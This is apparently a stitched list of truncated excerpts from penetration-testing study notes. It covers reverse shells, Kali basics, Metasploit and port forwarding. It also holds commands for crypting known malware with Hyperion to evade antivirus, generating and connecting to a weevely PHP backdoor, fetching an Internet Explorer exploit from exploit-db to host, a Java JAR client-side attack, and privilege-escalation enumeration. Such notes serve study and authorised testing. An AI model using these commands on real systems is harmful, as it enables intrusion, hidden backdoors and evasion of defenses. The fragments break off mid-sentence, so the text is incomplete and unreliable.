There are many pages on the web documenting quick reverse shell one-liners.
Pentestmonkey and Bernardo Damele have both created a good few posts between
them but I wanted to recapture what they’ve got for my notes purposes.
(It’s easier for me to find stuff if it’s in one place).
All credit goes to both of those guys where I got all t...
Penetration Testing: What You Should Know
About Kali Linux
About Penetration Testing
The megacorpone.com Domain
Offensive Security Labs
Getting Comfortable with Kali Linux
Finding Your Way Around Kali
Managing Kali Linux Services
The Bash Environment
Intro to Bash Scripting
Crypting Known Malware with Software Protectors
One such open source crypter, called Hyperion
i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
cp -p /usr/lib/gcc/i686-w64-mingw32/5.3...
See Metasploit Unleashed Course in the Essentials
Search for exploits using Metasploit GitHub framework source code:
Translate them for use on OSCP LAB or EXAM.
Metasploit requires PostgreSQL
systemctl start postgresql
Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
apt-get install rinetd
# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
SSH Local Port Forwarding: supports bi-directional communicatio...
Convert multiple webpages into a word list
for x in 'index' 'about' 'post' 'contact' ; do \
curl http://$ip/$x.html | html2markdown | tr -s ' ' '\n' >> webapp.txt ; \
done
Or convert html to word ...
WebShag Web Application Vulnerability Assessment Platform
ls -l /usr/share/webshells/
Generate a PHP backdoor (generate) protected with the given password (s3cr3t)
weevely generate s3cr3t
weevely http://$ip/weevely.php s3cr3t
MS12-037 - Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html http://www.exploit-db.com/download/24017
service apache2 start
Java Signed JAR client-side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
Metasploit Meterpreter Privilege Escalation Guide https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group:
net user "%username%"
Try the getsystem command using meterpreter - rarely works but is worth a try.
De facto Linux Privilege Escalation Guide - A much more thorough guide for Linux enumeration: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Try the obvious - Maybe the user is root or can sudo to root:
Here are the commands I have learned to use to perform Linux enumeration and privilege escal...